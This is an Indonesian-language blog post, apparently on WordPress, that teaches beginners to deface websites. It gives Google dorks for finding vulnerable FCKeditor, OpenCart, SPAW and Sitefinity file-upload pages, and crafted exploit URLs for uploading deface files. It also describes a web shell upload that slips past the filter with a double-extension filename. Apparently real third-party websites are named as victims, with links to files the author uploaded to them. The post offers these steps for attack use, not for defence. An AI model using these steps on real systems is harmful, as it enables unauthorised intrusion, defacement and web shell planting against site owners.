Newbie Defacing

Deface yaitu menggati tampilan halaman sebuah website. Biasanya para defacer mencantumkan pesan dalam halaman website yang telah di hack dengan tujuan tertentu atau hanya sekedar iseng. Ada banyak teknik hacking yang dilakukan untuk mendeface suatu website. Kali ini kita akan buktikan  bahwa deface itu mudah seperti teknik XSS, tapi saya tidak membahas teknik XSS sekarang. Yang harus dipersiapkan adalah file deface, saya anggap sudah mempuyai file deface sendiri ya. Ada berbagai teknik yang kita gunakan.

1. Defacing ASPX

Langsung buka google, masukkan dork inurl:Fck/fcklinkgallery.aspx atau /portals/0/inurl:tabid/176/Default.aspx. Lalu saya ambil salah satu contoh web yg vuln http://www.primeplasticsinc.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan akan tampil halaman seperti ini. Link type nya kita ubah ke file (a file in your site).

 

Lalu ubah URL nya menjadi javascript:__doPostBack(‘ctlURL$cmdUpload’,” ). Maka tampil command choose file, lalu masukkan file anda dan upload.

Note: ekstensi file yang dapat di upload yaitu  ( *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip )

Untuk melihat hasilnya maka tambahkan public_html/portals/0/file_kamu. Maka akan seperti ini http://www.primeplasticsinc.net/portals/0/adhie70.txt mudah bukan🙂

2. Defacing OpenCart

Buka google, masukkan dork  Powered By OpenCart site:.com atau SUPPORT BY OPENCART

Saya mendapatkan target www.centaurguitar.com/storefront2/ lalu kita masukkan exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html. Jadi alamatnya akan seperti ini www.centaurguitar.com/storefront2/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html dan akan muncul halaman website seperti ini

 

 

 

Ok langsung saja upload file kita, jika berhasil maka akan muncul message box “File uploaded with no errors” dan hasilnya seperti ini http://www.centaurguitar.com/adhie70.html

3.    Defacing SPAW

Buka google, masukkan dork nya inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/

Contoh targetnya seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php lalu perhatikan gambar ini

 

URL yang saya blog hapus dan diganti spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

 

Maka akan alamat URL nya akan seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da75%202d9%208cac9 dan muncul pilihan upload, tinggal upload saja file nya. Dan hasilnya seperti ini http://www.demariahoeve.nl/cms/spaw2/uploads/files/adhie70.txt

4.   Defacing Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : “Sitefinity: Login”

Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

Cari targetnya sama seperti cara diatas. Contoh targetnya http://www.hoac-bsa.org/sitefinity/ lalu masukkan exploitnya sehingga seperti ini http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx lalu sekarang kita tinggal upload sheelnya, dalam ASP.NET file yang dapat diupload adalah JPG, contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif). Jika sudah diupload, maka cara untuk menampilkan shell kita dengan mengklik “view original size” dan hasilnya seperti ini http://www.hoac-bsa.org/Images/adhie70.asp;.jpg

Mungkin segitu aja yang bisa saya share, jadi kesimpulannya deface itu mudah bukan??

5 thoughts on “Newbie Defacing

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s